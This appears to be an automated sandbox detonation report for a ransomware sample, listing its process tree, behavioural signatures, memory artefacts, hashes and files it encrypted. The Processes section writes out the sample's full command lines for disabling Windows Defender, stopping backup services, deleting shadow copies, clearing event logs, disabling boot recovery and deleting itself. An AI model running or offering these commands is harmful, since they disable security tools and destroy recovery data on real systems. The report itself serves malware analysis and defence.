Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 644 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 644 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 644 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1500 wrote to memory of 532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1500 wrote to memory of 532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1500 wrote to memory of 532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1976 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1976 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1976 wrote to memory of 1752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 620 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 620 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 620 wrote to memory of 1984 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 2036 wrote to memory of 1056 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2036 wrote to memory of 1056 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2036 wrote to memory of 1056 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1088 wrote to memory of 852 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1088 wrote to memory of 852 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1088 wrote to memory of 852 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 820 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 820 wrote to memory of 1236 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1968 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\net.exe
PID 1464 wrote to memory of 792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1464 wrote to memory of 792 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1968 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe
PID 1968 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\ihr6_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1

Network

N/A

Files

memory/644-54-0x0000000000000000-mapping.dmp

memory/1624-55-0x0000000000000000-mapping.dmp

memory/1500-56-0x0000000000000000-mapping.dmp

memory/532-57-0x0000000000000000-mapping.dmp

memory/1976-58-0x0000000000000000-mapping.dmp

memory/1752-59-0x0000000000000000-mapping.dmp

memory/620-60-0x0000000000000000-mapping.dmp

memory/1984-61-0x0000000000000000-mapping.dmp

memory/2036-62-0x0000000000000000-mapping.dmp

memory/1056-63-0x0000000000000000-mapping.dmp

memory/1088-64-0x0000000000000000-mapping.dmp

memory/852-65-0x0000000000000000-mapping.dmp

memory/820-66-0x0000000000000000-mapping.dmp

memory/1236-67-0x0000000000000000-mapping.dmp

memory/1464-68-0x0000000000000000-mapping.dmp

memory/792-69-0x0000000000000000-mapping.dmp

memory/1648-70-0x0000000000000000-mapping.dmp

memory/652-71-0x0000000000000000-mapping.dmp

memory/844-72-0x0000000000000000-mapping.dmp

memory/1272-73-0x0000000000000000-mapping.dmp

memory/1204-74-0x0000000000000000-mapping.dmp

memory/684-75-0x0000000000000000-mapping.dmp

memory/1628-76-0x0000000000000000-mapping.dmp

memory/1508-77-0x0000000000000000-mapping.dmp

memory/1680-78-0x0000000000000000-mapping.dmp

memory/616-79-0x0000000000000000-mapping.dmp

memory/1112-80-0x0000000000000000-mapping.dmp

memory/1716-81-0x0000000000000000-mapping.dmp

memory/384-82-0x0000000000000000-mapping.dmp

memory/1984-83-0x0000000000000000-mapping.dmp

memory/1052-84-0x0000000000000000-mapping.dmp

memory/1924-85-0x0000000000000000-mapping.dmp

memory/2000-86-0x0000000000000000-mapping.dmp

memory/744-87-0x0000000000000000-mapping.dmp

memory/1872-88-0x0000000000000000-mapping.dmp

memory/320-89-0x0000000000000000-mapping.dmp

memory/856-90-0x0000000000000000-mapping.dmp

memory/1712-91-0x0000000000000000-mapping.dmp

memory/1096-92-0x0000000000000000-mapping.dmp

memory/1548-93-0x0000000000000000-mapping.dmp

memory/1316-94-0x0000000000000000-mapping.dmp

memory/328-95-0x0000000000000000-mapping.dmp

memory/1832-96-0x0000000000000000-mapping.dmp

memory/1824-97-0x0000000000000000-mapping.dmp

memory/1160-98-0x0000000000000000-mapping.dmp

memory/1748-99-0x0000000000000000-mapping.dmp

memory/1236-100-0x0000000000000000-mapping.dmp

memory/1596-101-0x0000000000000000-mapping.dmp

memory/1652-102-0x0000000000000000-mapping.dmp

memory/1940-103-0x0000000000000000-mapping.dmp

memory/1740-104-0x0000000000000000-mapping.dmp

memory/1588-105-0x0000000000000000-mapping.dmp

memory/1624-106-0x0000000000000000-mapping.dmp

memory/1820-107-0x0000000000000000-mapping.dmp

memory/1492-108-0x0000000000000000-mapping.dmp

memory/896-109-0x0000000000000000-mapping.dmp

memory/1328-110-0x0000000000000000-mapping.dmp

memory/736-111-0x0000000000000000-mapping.dmp

memory/1600-112-0x0000000000000000-mapping.dmp

memory/1600-113-0x000007FEFB551000-0x000007FEFB553000-memory.dmp

memory/1732-114-0x0000000000000000-mapping.dmp

memory/2028-116-0x0000000000000000-mapping.dmp

memory/1604-118-0x0000000000000000-mapping.dmp

memory/1720-119-0x0000000000000000-mapping.dmp

memory/1384-120-0x0000000000000000-mapping.dmp

memory/852-122-0x000007FEF2040000-0x000007FEF2B9D000-memory.dmp

memory/852-124-0x0000000002300000-0x0000000002302000-memory.dmp

memory/852-125-0x0000000002302000-0x0000000002304000-memory.dmp

memory/852-126-0x0000000002304000-0x0000000002307000-memory.dmp

memory/852-123-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

memory/852-127-0x000000000230B000-0x000000000232A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2aa9f499df2f8b28486532cd948eb75b
SHA1 64579980334326fa5e99cb49e22a46ac86a8fa6b
SHA256 7ff364a4895a250e935f2eba287e205406915ec6e5d944d1eb30edfc8118f00c
SHA512 4f5b6e1bf43d84c82c39df37c320b10a79d147fc8ce6ab1e237b4f363f49053a2d64943dd6f77946233bbb9ef474d77952d2f81279a9c58212539722cce2191b

memory/2140-130-0x000007FEF2580000-0x000007FEF30DD000-memory.dmp

memory/2140-131-0x00000000023B0000-0x00000000023B2000-memory.dmp

memory/2140-132-0x00000000023B2000-0x00000000023B4000-memory.dmp

memory/2140-133-0x00000000023B4000-0x00000000023B7000-memory.dmp

memory/2140-134-0x00000000023BB000-0x00000000023DA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-23 08:33

Reported

2022-03-23 08:40

Platform

win10v2004-en-20220113

Max time kernel

131s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_NgAAADYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageStoreLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\PSS10O.CHM.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_OAAAADgAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-windows.xml.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_CgAAAAoAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\doh-rollout@mozilla.org.xpi.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Kiss.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\mscss7cm_en.dub.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Sybase.xsl.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_EAAAABAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageBadgeLogo.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\javafx.properties.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_JgAAACYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_KgAAACoAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
